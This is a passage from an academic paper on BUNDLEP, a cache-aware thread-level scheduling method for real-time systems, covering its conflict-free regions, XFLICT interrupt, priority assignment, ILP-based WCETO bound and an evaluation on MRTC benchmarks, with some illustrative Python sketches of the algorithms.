\(n_1\) and \(n_2\).
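The labeling DFS and its four conflict cases can be sketched in Python. This is an illustrative model, not the paper's implementation: `succs`, `block`, `is_loop_head`, `in_loop`, and the direct-mapped cache dictionary are stand-ins for the CFG, loop bookkeeping, and the simulated cache that TagCFRs() shares with LabelNodes().

```python
def label_nodes(entry, succs, block, cache_size, is_loop_head, in_loop, label):
    """Sketch of LabelNodes(): DFS from the CFR entry, stopping at the four
    conflict cases; returns the entry nodes of subsequent CFRs.

    succs:        dict node -> list of successor nodes (the CFG)
    block:        dict node -> cache block the instruction maps to
    cache_size:   number of direct-mapped cache sets
    is_loop_head: predicate, True if a node heads a loop
    in_loop:      predicate (head, node), True if node belongs to head's loop
    label:        dict node -> CFR label, shared across calls (as in TagCFRs)
    """
    cache = {}                       # simulated direct-mapped cache: set -> block
    conflicts = []                   # x: entry nodes of subsequent CFRs
    visited = set()                  # v: local visited marks
    stack = [entry]                  # s: local DFS stack
    label[entry] = entry
    cache[block[entry] % cache_size] = block[entry]
    while stack:
        u = stack.pop()
        if u in visited:
            continue
        visited.add(u)
        if u == entry:
            stack.extend(succs.get(u, []))
            continue
        cset = block[u] % cache_size
        conflict = (
            (is_loop_head(entry) and not in_loop(entry, u))      # Case 1: loop exit
            or is_loop_head(u)                                   # Case 2: loop head
            or (label.get(u) is not None and label[u] != entry)  # Case 3: existing CFR
            or (cset in cache and cache[cset] != block[u])       # Case 4: cache conflict
        )
        if conflict:
            conflicts.append(u)      # u starts a subsequent CFR; skip successors
        else:
            label[u] = entry
            cache[cset] = block[u]
            stack.extend(succs.get(u, []))
    return conflicts
```

On a three-node straight-line CFG where the third instruction's block collides with the entry's cache set, the call labels the first two nodes with the entry and reports the third as the start of the next CFR.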
Figure 6c is the result of calling \textsc{LabelNodes}\((n_2)\) with Case 3 protection. With the protection in place, when \textsc{LabelNodes}\((n_2)\) returns to \textsc{TagCFRs}(), it returns \(\{n_3\}\) as the set of entry points for subsequent CFRs. There is an issue to be resolved with respect to \(n_3\) in Figure 6c. Before the call, \(n_3\) was assigned to the CFR \(n_1\), but it is now an entry node to a new CFR. As previously stated, a node must reside in exactly one CFR. Case 3 resolves this issue as well, as seen in Figure 6d, the result of calling \textsc{LabelNodes}\((n_3)\). When the \textsc{TagCFRs}() procedure returns, tagging has been completed. All nodes of the CFG have been assigned to CFRs given by their \(n.\text{label}\). What remains to complete the CFRG is to add edges between CFRs. This final stage is referred to as linking. Pseudocode for linking is omitted due to the simplicity of the operation: a DFS of the CFG in which each unique label is added to the CFRG as a node, and an edge is added whenever an edge in the CFG has differing labels at its endpoints. The result is a CFRG \( R = (N, E, h) \), where \( N \) is the set of CFRs, \( E \) the edges between CFRs, and \( h \) the entry CFR. For consistency and clarity, a CFR \( F_i \) is identified by its entry node \( n_i \) in the CFG, as is the corresponding node in the CFRG. For example, in Figure 6 the CFRG node and CFR \(n_3\) are labeled so because the entry instruction of the CFR was \( n_3 \) in the CFG. VI. BUNDLEP After converting a CFG to a CFRG, priorities are assigned to CFRs to minimize the number of activations of each bundle. At run-time, the BUNDLEP scheduling algorithm relies on some hardware mechanism that halts threads attempting to execute the entry instruction of an inactive CFR. Such a mechanism was proposed in [23]; however, it relied on cache evictions rather than thread execution, making it unsuitable for BUNDLEP. This section proposes a new conflict interrupt mechanism suitable for halting threads. The XFLICT interrupt behavior closely matches that of hardware breakpoints [24].
A. Hardware Support The XFLICT interrupt represents the attempted execution of an instruction that may result in a cache conflict. Since the execution may or may not result in a conflict, the decision to raise an interrupt cannot be made without additional information. That additional information is encoded in the XFLICT TABLE. When the program counter is set to a value present in the XFLICT TABLE, the proposed hardware mechanism halts the CPU before executing the instruction and raises an XFLICT interrupt carrying ancillary data encoding the address of the instruction that raised it. To illustrate how the interrupt, table, and scheduling algorithm work together, the process of activating \(n_2\) is described below. In Figure 7a, \(n_1\) has been depleted and its two threads have moved to \(n_3\), where they are blocked. The BUNDLEP scheduling algorithm will now select \(n_2\) as active and begin executing threads. Before \(n_2\) is activated, the XFLICT TABLE (abbreviated X in the figure) is cleared, and the values are replaced with the addresses of the entry instructions of the subsequent CFRs of \(n_2\): \( (a_3, a_4) \). Recall that every node of the CFG is identified by its address \( a \) and stack \( s \); CFRs are identified by their entry nodes from the CFG, in this case \( n_3 \) and \( n_4 \). In Figure 7b, \(n_2\) has been activated and threads are permitted to execute. When any thread attempts to execute either \( a_3 \) or \( a_4 \), the XFLICT interrupt is raised before the thread can execute it. The BUNDLEP scheduling algorithm receives the interrupt, blocks the thread, and places it into the correct bundle. Figure 7c provides a snapshot of execution after the first two threads of \(n_2\) have exited the bundle and are blocked awaiting the activation of \( n_3 \) or \( n_4 \). B. BUNDLEP's Scheduling Algorithm Incorporation of the XFLICT interrupt and priorities into BUNDLEP scheduling is given by Algorithm 3, the pseudocode for BUNDLEP.
Bundles are stored in the array \( B \), indexed by the nodes of the CFRG \( R \). A single bundle \( b \) has four members: a starting address \( b.a \), a node from the CFRG \( b.n \), a priority \( b.\pi \), and a set of threads \( b.t \). When a bundle is ready, it is placed in the priority queue \( P \). Lines 6-8 are responsible for adding the threads of the job to the initial bundle and adding the bundle to the priority queue. Each iteration of the outer while loop starting on line 9 removes the best-priority bundle from the queue and activates it. Lines 10-17 manage the XFLICT TABLE and a local mapping from address to CFRG node. Addresses of successors to \( b \) are added to the XFLICT TABLE so that interrupts will be delivered when threads exit \( b \). However, those addresses may map to more than one CFR. To avoid ambiguity, the \( S \) array maps addresses of successor CFRs to their proper node in the CFRG. The inner for loop starting on line 18 executes each thread of the active bundle. When an XFLICT interrupt is raised, the thread is placed in the successor's bundle, which is added to the priority queue as a candidate for activation. If the interrupt is not raised, the thread has terminated and belongs to no bundle. It is appropriate to mention the data structures used for bundles and threads at this point. Threads of bundles are removed
Algorithm 3 BUNDLEP Scheduling Algorithm
1: \( T \) \(\triangleright\) Set of threads
2: \( R = (N, E, h) \) \(\triangleright\) Conflict Free Region Graph
3: \( P \) \(\triangleright\) Priority queue of ready bundles
4: \( B \) \(\triangleright\) Array of bundles indexed by their node \( n \in N \)
5: procedure BUNDLEP
6:   \( b \leftarrow B[h] \)
7:   \( b.t.\text{add}(T) \)
8:   \( P.\text{insert}(b, b.\pi) \)
9:   while \( b \leftarrow P.\text{removeMax}() \) do \(\triangleright\) Best bundle
10:    \( S \leftarrow \emptyset \) \(\triangleright\) Clear the successor array
11:    XFLICT_CLEAR() \(\triangleright\) Clear the XFLICT table
12:    \(\triangleright\) Create the mapping of address to node
13:    for \( s \in R.\text{succs}(b.n) \) do
14:      \( b_{n} \leftarrow B[s] \)
15:      \( S[b_{n}.a] \leftarrow b_{n} \)
16:      XFLICT_ADD(\( b_{n}.a \))
17:    end for
18:    for \( t \in b.t \) do
19:      try { RUN(\( t \)) }
20:      catch XFLICT \( x \) { \(\triangleright\) Get the next bundle
21:        \( b_{\text{next}} \leftarrow S[x.a] \)
22:        \( b_{\text{next}}.t.\text{add}(t) \)
23:        \( P.\text{insert}(b_{\text{next}}, b_{\text{next}}.\pi) \)
24:      } \(\triangleright\) \( t \) has not terminated
25:      end try
26:    end for
27:  end while
28: end procedure

on line 18; the order is irrelevant, requiring nothing more than an array with \( \mathcal{O}(1) \) time for extraction. Bundle activation order is important; bundles are removed from a priority queue on line 9.
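The control flow of Algorithm 3 can be sketched in Python, modeling the XFLICT interrupt as an exception and the priority queue with `heapq`. Thread representation (a trace of addresses with a cursor), the `succs` map, and the `prio` map are illustrative stand-ins, not the paper's implementation.

```python
import heapq

class XFLICT(Exception):
    """Raised when a thread reaches an address in the XFLICT table."""
    def __init__(self, addr):
        self.addr = addr

def run_thread(thread, xflict_table):
    """Advance a thread (a list of instruction addresses plus a cursor)
    until it terminates or reaches an address in the XFLICT table."""
    while thread["pc"] < len(thread["trace"]):
        addr = thread["trace"][thread["pc"]]
        if addr in xflict_table:
            raise XFLICT(addr)       # halt *before* executing the instruction
        thread["pc"] += 1            # "execute" the instruction

def bundlep(threads, succs, entry_addr, prio):
    """Sketch of Algorithm 3: bundles keyed by CFR entry address, a
    max-priority queue of ready bundles (heapq is a min-heap, so push
    negated priorities), and XFLICT-driven migration between bundles."""
    bundles = {a: [] for a in prio}          # B: threads awaiting each CFR
    bundles[entry_addr] = list(threads)      # lines 6-8: all threads start at h
    ready = [(-prio[entry_addr], entry_addr)]
    queued = {entry_addr}
    order = []                               # activation order, for inspection
    while ready:                             # line 9: best-priority bundle
        _, a = heapq.heappop(ready)
        queued.discard(a)
        order.append(a)
        xflict_table = set(succs[a])         # lines 10-17: program the table
        for t in bundles[a]:                 # line 18: run every thread
            try:
                run_thread(t, xflict_table)  # no interrupt: t has terminated
            except XFLICT as x:
                bundles[x.addr].append(t)    # move t to the successor's bundle
                if x.addr not in queued:
                    heapq.heappush(ready, (-prio[x.addr], x.addr))
                    queued.add(x.addr)
        bundles[a] = []
    return order
```

Here `heapq` is a binary heap, so both insert and removeMax cost O(log n); the complexity discussion that follows assumes a Fibonacci heap instead.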
An efficient implementation using a Fibonacci heap has complexity \( \mathcal{O}(1) \) for insertions and amortized complexity \( \mathcal{O}(\log n) \) for removeMax. Thus each iteration of the while loop is dominated by the removeMax operation, which is accounted for in the WCETO analysis of Section VII. C. Priority Assignment Priorities are assigned to CFRs during the offline object analysis based on their longest path value from the entry CFR \( h \). The priority assignment method requires the CFRG to be a DAG. This requirement is impossible to meet in all circumstances: although the analysis does not introduce loops, the program structure may contain them. These \textit{user-defined} loops may be contained within a single CFR, which eases the analysis, or they may span multiple CFRs, creating a necessary loop in the CFRG. The structure of CFRs from user-defined loops allows them to be collapsed into a single \textit{false} node. Every loop has a head, members, and at least one exit CFR. The loop head identifies all members of the loop, which are \textit{collapsed} into a single false node during priority assignment and WCETO calculation. Priorities are first assigned to the interior nodes; the false node is then assigned a priority in the greater \textit{scope}. Figure 8 illustrates two scopes of loop collapse. In Figure 8a, at the greatest scope there is a single loop, which is collapsed into a single false node \( n_1 \). As part of being collapsed, the interior nodes are assigned priorities corresponding to their longest path from the loop head. The false node is given a priority according to the longest path to reach it from the entry node, with two caveats. First, the interior real (i.e., not false) node that is the loop head must have a priority worse than all other members of the loop. Second, each false node is given a unique priority within its scope; this guarantees only members of the loop execute until all threads exit the loop.
This is why the false node \( n_1 \), denoted by a hexagon, has priority 4, which is inherited by the loop head. \begin{figure}[h] \centering \includegraphics[width=0.8\textwidth]{figure8.png} \caption{Loop Collapse and False Nodes} \end{figure} Figure 8b illustrates a smaller scope of embedded loop collapse. The inner loop is processed first, which affects the priority values of members within the outer loop. By repeatedly collapsing loops into false nodes, all loops are removed and the CFRG is converted to a DAG. Additionally, at each scope within a collapsed node the graph structure is also a DAG (when excluding the incoming edges to the loop head). Assigning priorities to interior nodes of the same scope equal to their longest path from the loop head (which has the worst priority) guarantees each CFR is activated at most once per iteration, as shown in Theorem 2. Theorem 2 (Maximum Bundle Activations per Iteration). For a graph of the collapsed node \( G=(N,E,n_0) \) with loop head \( n_0 \), set of in-scope nodes \( N \) and edges \( E \), where each node \( n \in N \) has priority \( \pi \) equal to the longest path from \( n_0 \) to \( n \), and \( n_0 \) has a priority worse than all others (\( \pi_0 > \pi_j \) for all \( n_j \in N \)), each bundle \( n \in N \) will be activated at most once per iteration of \( n_0 \). \textbf{Proof.} \textbf{Observation I:} For a node \( n_k \) in scope of \( n_0 \) that is a loop head, \( n_k \) will be collapsed with all other nodes that have \( n_k \) as their inner-most loop head. Only the collapsed node \( n_k \) will be in scope of \( n_0 \). Therefore, for any collapsed node, there is exactly one loop in scope with head \( n_0 \). \textbf{Observation II:} A single iteration of the loop contained within a collapsed node is defined as the series of activations that begins with the activation of \( n_0 \) and ends just before \( n_0 \) would be selected as active once again.
Since \( n_0 \) has the worst priority among all in-scope nodes, all other nodes must have been depleted before \( n_0 \) could be activated again. **Observation III:** All other threads not in the loop of \( n_0 \) must be in bundles with worse priority than any bundle in the current scope. (Otherwise, bundles in \( n_0 \)'s scope would not be scheduled.) Thus, the current loop (and embedded loops) will complete all iterations before any out-of-scope bundle is executed. Consider the graph \( G' = (N, E', n_0) \) where the incoming edges to \( n_0 \) have been removed, eliminating the cycle: \( E' = \{ (u, v) \in E \mid v \neq n_0 \} \). By Observation I, \( G' \) is now a DAG of CFRs. Treating a single iteration as a job release and applying Theorem 1 to \( G' \), each \( n \in N \) is activated at most once per iteration for all threads executing the loop. \( \square \) **VII. BUNDLEP WCETO CALCULATION** As a practical effort, the focus of this work is on the calculation of an effective, safe WCETO bound. To that end, the bound calculation is formulated as an integer linear program (ILP) whose number of variables grows as \( \mathcal{O}(V + E) \). This section is devoted to describing the transformation of a CFRG into a set of constraints and an objective function. Assigning priorities to nodes of the CFRG and collapsing loops (as described in Section VI) guarantees each node is activated at most once. As such, the contributions of individual nodes may be considered in isolation. What determines a node's individual contribution is the number of threads assigned to it. The maximization problem becomes finding the greatest sum of contributions of individual nodes over valid assignments of threads. Figure 9 illustrates the relationship between the CFRG, the WCETO of individual nodes \( \omega_{n}(t_{n}) \), and the objective function \( \Omega = \sum_{n \in N} \omega_{n}(t_{n}) \). Refer to Figure 13 in the appendix for a more detailed example.
Fig. 9: CFRG Individual Nodes and ILP Objective

The WCETO of a node \( \omega_{n}(t_{n}) \) depends on the number of threads assigned to it, \( t_{n} \). For real nodes, the function takes the form of Equation 1. We assume a timing-compositional architecture [25]; the number of cycles required to complete a single node is divided into two parts, the memory demand and the execution demand. The memory demand of a node \( n \) is the product of the number of ECBs found in the CFR, \( |ECB_{n}| \), and the block reload time \( B \), denoted \( \gamma_{n} = B \cdot |ECB_{n}| \). The execution demand is the product of the worst-case execution time of a single thread over the node \( c_{n} \) and the number of threads assigned \( t_{n} \). Two context switch costs are included to reflect the penalty of BUNDLEP scheduling: \( X_b \) is the number of cycles required to switch to a new active bundle, and \( X_t \) is the cost of selecting a thread from the active bundle. The costs \( X_b \) and \( X_t \) correspond directly to lines 9 and 18 of Algorithm 3. \[ \omega_{n}(t_{n}) = \begin{cases} 0, & t_{n} = 0 \\ X_b + (c_{n} + X_t) \cdot t_{n} + \gamma_{n}, & t_{n} \geq 1 \end{cases} \quad (1) \] The WCETO for false nodes is given in Equation 2. It depends on the maximum number of iterations of the loop collapsed into the false node \( n \) and on \( inscope(n) \). The set of nodes returned by \( inscope(n) \) are the interior nodes of the false node \( n \), which may include other false nodes. For example, in Figure 8b, \( inscope(n_1) = \{n_1, n_2, n_3, n_5\} \), where \( n_1 \) is a real node and \( n_3 \) a false node. \[ \omega_{n}(t_{n}) = \begin{cases} 0, & t_{n} = 0 \\ \sum_{i \in inscope(n)} \omega_{i}(t_{i}), & t_{n} \geq 1 \end{cases} \quad (2) \] The memory and execution demand of a false node are not entirely separable. Individual nodes within scope of \( n \) have their per-iteration context switch contribution bounded by \( \omega_{i}(t_{i}) \), described later.
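A real node's contribution can be sketched directly from the quantities named in the prose. The sketch below assumes the bundle switch \( X_b \) and the memory demand are paid once per activation, while the thread switch \( X_t \) and execution demand \( c_n \) are paid per thread; all parameter values used here are illustrative only.

```python
def node_wceto(t, c, ecbs, B, Xb, Xt):
    """WCETO contribution of a real CFR node (cf. Equation 1).

    t    -- threads assigned to the node
    c    -- worst-case execution cycles of one thread over the node
    ecbs -- set of evicting cache blocks (ECBs) of the CFR
    B    -- block reload time in cycles
    Xb   -- bundle-level context switch cost (line 9 of Algorithm 3)
    Xt   -- thread-level context switch cost (line 18 of Algorithm 3)
    """
    if t == 0:
        return 0                    # an inactive node contributes nothing
    memory = B * len(ecbs)          # each ECB is loaded once per activation
    execution = c * t               # every thread runs the node's WCET path
    switches = Xb + Xt * t          # one bundle switch, one thread switch each
    return switches + execution + memory
```

With \( B = 100 \), \( X_b = 55 \), \( X_t = 10 \), four ECBs, \( c_n = 10 \), and four threads, the node contributes \( 55 + 4 \cdot 10 + 4 \cdot 10 + 400 = 535 \) cycles. The memory term dominates, and it is exactly this term that BUNDLEP shares: it is paid once per activation rather than once per thread.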
An initial memory demand for the false node \( n \) is calculated as \( \gamma_{n} \). It represents the number of cycles required to cache all blocks of nodes within the collapsed node regardless of scope. The set of nodes \( allscope(n) \) includes any real node that has been collapsed under \( n \). Using Figure 8b, \( allscope(n_1) = \{n_1, n_2, n_3, n_4, n_5\} \), where no node is false. Using the set of all nodes collapsed under \( n \), the multiset union of their ECBs is formed and labeled \( ECB_{n} = \bigcup_{i \in allscope(n)} ECB_{i} \). The product of the cardinality of the ECB multiset and the block reload time produces \( \gamma_{n} = B \cdot |ECB_{n}| \). This value accounts for all of the cycles required to load every cache block found in the collapsed node. For a false node \( i \) collapsed under a false node \( n \), its WCETO contribution \( \omega_{i}(t_{i}) \) is defined by Equation 2. For a real node \( i \) under a false node \( n \), its WCETO contribution \( \omega_{i}(t_{i}) \) is given by Equation 3. It includes context switch costs, execution demand, and the worst-case memory demand. A method similar to the ECB-Union CRPD approach [2] is employed to calculate the memory demand from the perspective of the affected node \( i \). The worst case occurs when another real node collapsed under \( n \) evicts the ECBs of \( i \), forcing the blocks \( ECB_{i} \) to be loaded when \( i \) is activated. The number of evictions can be bounded by the ECBs of all loop members, specifically those that occur more than once in the loop. The multiset of ECBs found more than once under the collapsed node is denoted \( \widehat{ECB}_{n} \). Thus, the memory demand bound for \( i \) is \( \gamma_{i} = |\widehat{ECB}_{n} \cap ECB_{i}| \cdot B \). Incorporating per-iteration context switches, execution, and memory demand into the bound for \( i \) yields Equation 3.
\[ \omega_{i}(t_{i}) = \begin{cases} 0, & t_{i} = 0 \\ X_b + (c_{i} + X_t) \cdot t_{i} + \gamma_{i}, & t_{i} \geq 1 \end{cases} \quad (3) \] A valid assignment of threads takes into account the structure of the CFRG. To reflect the structure, threads are treated as flow traversing the edges of nodes. The entry node is treated as the source of flow, providing a total of \( m \) threads on its outgoing edges. All threads must reach the terminal node. At each node other than the entry and terminal nodes, the sum of threads along incoming edges must equal the sum along outgoing edges. The ILP finds the assignment of threads according to the flow of the CFRG which maximizes the number of cycles required to complete \( m \) threads under BUNDLEP scheduling, thus bounding the WCET of a job. To conserve space in the main body of the work, the details of transforming the formulation into ILP constraints are placed in Appendix A. VIII. EVALUATION The evaluation takes the approach of comparing BUNDLEP's thread-level scheduling algorithm to a naive algorithm which executes threads one after another (serially). Individual benchmarks from the Mälardalen MRTC suite [26] are treated as ribbons releasing \( m \) threads per job. The WCET of each job is analyzed twice: once for a single multi-threaded task scheduled by BUNDLEP, and again for \( m \) serial threads by Heptane. Similarly, the run-time behavior is collected for each benchmark under BUNDLEP and serial execution. A fully functional virtual machine with the tools and source is available for download to recreate these results or expand upon them [9]. Ideally, BUNDLEP would also be compared with BUNDLE. However, the evaluation in [5] used synthetic programs rather than compiled source (for any architecture). WCETO analysis for BUNDLE is also intractable, with complexity \( \mathcal{O}(\prod_j |N_j|^m) \).
This is due to the nature of the algorithm: it does not restrict the flow of threads through the CFRG, which demands that all paths be repeatedly searched. A novel BUNDLE WCETO implementation of an intractable solution known to be dominated by BUNDLEP is not compelling; as such, it is omitted from the evaluation. The target platform for WCETO analysis and execution is a MIPS 74K processor with a direct-mapped single-level instruction cache. Cache blocks are restricted to 32 bytes. The CPI, block reload time \( B \), and number of cache blocks vary per Table I. Additionally, the number of threads per job \( m \) varies from 1 to 16 by powers of two. Jobs are executed on a MIPS simulator provided by Heptane and modified to execute BUNDLEP scheduling or a serial batch of threads.

CPI | BRT (\( B \)) | Cache Blocks | Threads (\( m \))
 1  |      100      |  8, 16, 32   |   2, 4, 8, 16
10  |      100      |  8, 16, 32   |   2, 4, 8, 16

TABLE I: MIPS 74K Architecture Parameters

Of the 27 MRTC benchmarks, 18 were evaluated. The selection is limited by Heptane's ability to perform WCET analysis using the \texttt{lp\_solve} ILP solver within the 12 gigabytes of RAM available (the complete results are available in the technical report [27]). For each benchmark, Heptane produces a single WCET value for the execution of one thread through the ribbon, denoted \( c_{il} \). To compare Heptane's WCET to BUNDLEP's WCETO \( \Omega \), the number of threads and context switch costs are incorporated and quantified as a difference \( \Delta_{\omega} = m \cdot (c_{il} + \omega_b) - \Omega \).
Similarly, the number of cycles required to execute serially on the simulator is denoted \( E_H \), the cycles required for BUNDLEP execution \( E_B \), and the comparison \( \Delta_B = E_H - E_B \). A positive \( \Delta \) value indicates the BUNDLEP approach provides a benefit. Context switch costs are encapsulated in BUNDLEP's WCETO \( \Omega \); they are not incorporated into \( c_{il} \). Serial execution models threads as jobs of distinct tasks, and switching between jobs incurs a task-level context switch cost. A job switch includes more heavyweight operations than a bundle-level context switch, such as exchanging task control blocks instead of thread control blocks. To favor the classical approach, the bundle-level context switch cost \( \omega_b \) is also used as the task-level context switch cost. There are two context switch costs for BUNDLEP: between bundles \( \omega_b \) and between threads \( \omega_t \). To find representative values for both costs, sample programs were written for the target architecture and analyzed using Heptane. Selecting a thread from an array and jumping to a new instruction address took less than 10 cycles. For \( \omega_b \), a precise value would require the implementation of a priority queue, supported by an optimized heap, that could be analyzed by Heptane. The implementation of such a priority queue is beyond the scope of this work. However, a limited set of queue operations was analyzed, with the removal of one of two items taking less than 55 cycles. Since removeMax grows as \( \log_2(m) \) for bundle selection, the context switch costs are set to \( \omega_b = 55 \cdot \log_2(m) \) and \( \omega_t = 10 \). Figures 10a and 10b summarize the results of the evaluation. The y-axis represents the number of benchmarks where BUNDLEP benefits the task. Along the x-axis, the groups separate the architecture parameters, which are enumerated by their BRT : CPI ratio and cache size.
For each group the result is tallied by the number of threads per job, from 1 to 16. There are several interesting observations to be made in Figure 10a. Though BUNDLEP analysis provides a benefit in the majority of cases, it does not always. As the cache size is reduced, the number of benchmarks that benefit increases. Similarly, as the number of threads per job increases, so does the number of benchmarks that benefit. These trends are due to the number of misses (typically) increasing as the cache size is reduced or the number of threads increased; BUNDLEP avoids these conflicts or converts them to cache hits. Surprisingly, for a single thread per job BUNDLEP may provide a lower bound; this is likely due to the use of the expanded CFG instead of the conventional CFG used by Heptane's analysis. The run-time benefit summary in Figure 10b more heavily favors BUNDLEP, with unsurprising trends. For a single thread per job, BUNDLEP provides no benefit since there is no reason to block and incur context switch costs. As the number of threads increases, so does the run-time performance. As the cache size decreases, the number of benchmarks that see a run-time performance increase grows. When compared to the WCETO benefit, more benchmarks benefit from the run-time behavior than the analysis would suggest. This implies further refinements of the analysis are possible. Across the four dimensions of the evaluation (cache size, BRT, CPI, and number of threads per job), BUNDLEP's benefit is expected to increase as the cache size decreases, increase as the BRT increases, decrease as the CPI increases, and increase as the number of threads per job increases. Many of the benchmarks match these expectations, such as the results for ud found in Figure 11. The evaluation provides further motivation for future improvements in the extraction of CFRs, the scheduling mechanism, and the bound calculation.
Benchmarks with anomalous results highlight the cost of BUNDLEP scheduling: the greater number of context switches. This cost must be balanced against the inter-thread cache benefit, which is not always achieved. Future work seeks to find a balance in two ways: 1) ensuring CFRs are of the greatest size, and 2) developing criteria to permit some cache conflicts when an imbalance exists. These efforts coincide with our ongoing development of a multi-task version of BUNDLEP integrated with the evaluation toolkit. REFERENCES X. ACKNOWLEDGMENTS We would like to express our gratitude to Isabelle Puaut and Damien Hardy for their personal assistance with Heptane and the MIPS simulator. Without a freely available, extensible, and reusable platform this work would not have been possible; thank you! APPENDIX A ILP CONSTRAINTS FROM WCETO CONTRIBUTIONS This appendix is dedicated to describing the transformation of Equations 1, 2, and 3 and the supply of threads into the constraints of the ILP for WCETO calculation. For a CFRG \( R = (N, E, h) \), the objective of the ILP is to maximize: \[ \Omega = \sum_{n \in N} \omega_n(t_n) \] Several variables are added to the ILP which are not present in the formulae. A binary selector variable \( b_n \in \{0, 1\} \) is added for each node; when its value is 1, the node has at least one thread assigned to it. For every edge \( (u, v) \in E \), the variable \( t_{(u,v)} \) represents the number of threads passed from node \( u \) to \( v \). The terminal node of the CFRG is identified as \( z \in N \), having out-degree zero. Two functions are defined for each node. The successor and predecessor functions return the sets given by their names. Both of these functions properly obey the scope of the provided node \( n \). If a false node is provided, the nodes collapsed within it will not be included in the set. If a real node collapsed within a false node is provided, the set will include only nodes found within the collapsed node (real or false).
**Functions**

\[ \text{preds}(n) \triangleq \{u \mid (u, n) \in E\} \] Set of immediate predecessors of \( n \in N \).

\[ \text{succs}(n) \triangleq \{v \mid (n, v) \in E\} \] Set of immediate successors of \( n \in N \).

What follows are the individual constraints generated for each node. To clarify, a top-most false node contributes its WCETO directly to the objective.

**Special Case Constraints**

- \( t_h \triangleq m \) - The initial node \( h \) must have all \( m \) threads assigned.
- \( t_z \triangleq m \) - The terminal node \( z \) must have all \( m \) threads assigned.
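The flow portion of the constraint set can be sketched by emitting lp_solve-style constraint text for a small CFRG. The variable naming (`t_u_v` for the edge variable \( t_{(u,v)} \)) and the exact output syntax are illustrative, not the paper's generator; the sketch assumes every interior node has at least one incoming and one outgoing edge.

```python
def flow_constraints(N, E, h, z, m):
    """Emit lp_solve-style constraints encoding threads as flow over the
    CFRG: the entry h supplies m threads, the terminal z absorbs m, and
    every other node conserves flow (inflow = outflow)."""
    var = lambda u, v: f"t_{u}_{v}"   # edge variable t_(u,v)
    # Entry node: all m threads leave on its outgoing edges.
    cons = [f"{' + '.join(var(h, v) for (x, v) in E if x == h)} = {m};"]
    for n in N:
        if n in (h, z):
            continue
        inflow = " + ".join(var(u, x) for (u, x) in E if x == n)
        outflow = " + ".join(var(x, v) for (x, v) in E if x == n)
        cons.append(f"{inflow} = {outflow};")   # conservation at n
    # Terminal node: all m threads arrive on its incoming edges.
    cons.append(f"{' + '.join(var(u, x) for (u, x) in E if x == z)} = {m};")
    return cons
```

For a diamond-shaped CFRG (entry `h`, interior `a` and `b`, terminal `z`) with `m = 4`, the generator produces the source constraint `t_h_a + t_h_b = 4;`, one conservation constraint per interior node, and the sink constraint `t_a_z + t_b_z = 4;`.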
**APPENDIX B WCETO EXAMPLE** The ILP objective function \( \Omega \) is the sum of the contributions of the CFRs of the CFRG given an assignment of threads per node. Figure 13 illustrates the source of each node's contribution for four threads \( (m = 4) \). It reuses the structure of Figure 9 with detailed memory and execution demand values that are closer to those found in the evaluation. Fig. 13: CFRG Individual Nodes and ILP Objective When completed, the ILP determines the WCETO bound is 2,680 cycles. Understanding how the bound is calculated is made easier by considering the memory demand independently of the execution demand. For \( n_0 \), there is no decision: all four threads are assigned. The memory demand for \( n_0 \) is 400 cycles, plus 40 cycles per thread, for 560 cycles total. There are no decisions to be made for \( n_1 \) or \( n_3 \); the number of threads assigned to them is determined by the structure of the graph. For threads to be assigned to \( n_4 \) and \( n_5 \), their combined execution and memory demand must be compared to \( n_2 \). For one thread, \( n_2 \) has a total demand of 610 cycles. For one thread, the combined demand for \( n_4 \) and \( n_5 \) is 710 cycles (the demand for the interior nodes of \( n_5 \) is 10 cycles per thread; though not explicitly listed in the figure, this is the reason \( \sum \omega = 20 = 2 \cdot 10 \)). The execution demand for a second (or third) thread of \( n_2 \) is 110 cycles, and the combined execution demand for a second thread of \( n_4 \) and \( n_5 \) is also 110 cycles. Any assignment where \( t_2, t_4, \) and \( t_5 \) are greater than or equal to one will result in the same WCETO value. The assignment in Figure 13 balances the threads across paths. Figure 14 lists the benchmarks evaluated. From the MRTC benchmark suite, 18 of the 27 tests were evaluated for their WCET and run-time performance. Benchmarks are treated as one code segment with \( m \) requests for execution per job release.
The classical perspective treats each execution as a job of a distinct task, while BUNDLEP views them as threads. From the classical perspective, jobs are scheduled serially, one after another. This is compared to BUNDLEP's thread-level scheduling using two metrics. The first, \( \Delta_\omega \), is the difference between the WCET of \( m \) serial threads and BUNDLEP's WCETO. When \( \Delta_\omega \) is positive, BUNDLEP provides an analytical benefit. The second metric is \( \Delta_B \), the difference in the number of cycles required to complete \( m \) threads serially versus under BUNDLEP's scheduling mechanism. A positive \( \Delta_B \) value indicates a shorter run-time under BUNDLEP. The names of the benchmarks evaluated are listed in Figure 14. Starting on the next page are the graphical results. Two graphs are given for each benchmark, one to illustrate the WCETO benefit (\( \Delta_\omega \)) and a second for the run-time benefit (\( \Delta_B \)). <table> <tbody> <tr><td>bs</td><td>bsort100</td></tr> <tr><td>crc</td><td>expint</td></tr> <tr><td>fft</td><td>insertsort</td></tr> <tr><td>jfdctint</td><td>lcdnum</td></tr> <tr><td>matmult</td><td>minver</td></tr> <tr><td>ns</td><td>nsichneu</td></tr> <tr><td>qurt</td><td>select</td></tr> <tr><td>simple</td><td>sqrt</td></tr> <tr><td>statemate</td><td>ud</td></tr> </tbody> </table> Fig. 14: Benchmarks of MRTC For each benchmark, altering the architecture parameters has the following anticipated effects on the performance of BUNDLEP. In general, as the number of cache lines increases, the analytical and run-time benefit of BUNDLEP is expected to decrease, since the shared resource BUNDLEP benefits from becomes less scarce. As the number of threads increases, the analytical and run-time benefit of BUNDLEP will increase, since the use of the cache increases.
As the ratio of cache block reload time to instruction execution time \( B : I \) increases, so should BUNDLEP's performance. For many of the benchmarks, BUNDLEP performs as expected when varying cache sizes, threads, and CPI. Examples include bs, bsort100, crc, insertsort, select, qurt, and ud. A highlight of the analytical and run-time benefit is the select benchmark. In the best case, BUNDLEP reduces the WCETO by roughly fifty percent, from a serial bound of nearly four million cycles to close to two million. At run-time, the observed execution time is roughly two-thirds of the serial version. For a few of the benchmarks (matmult, expint, and ns), BUNDLEP's analysis is worse for almost every architecture and thread configuration. For each of these benchmarks, the run-time behavior favors BUNDLEP only slightly more than the WCETO analysis does. Examining the structure of the CFRG for these benchmarks, we find embedded loops with small CFRs. Thus, the benefit of cache sharing is reduced and the penalty of bundle-level and thread-level context-switch costs is relatively high. In terms of analysis, the minver benchmark has the most inconsistent results. For instance, comparing the configurations (100:1, 16) and (100:10, 16): as the number of threads increases, the performance of BUNDLEP increases for the former, yet in the latter performance decreases, then increases. This benchmark lies on the cusp of analytical benefit and will receive further investigation, in part motivated by its consistent run-time 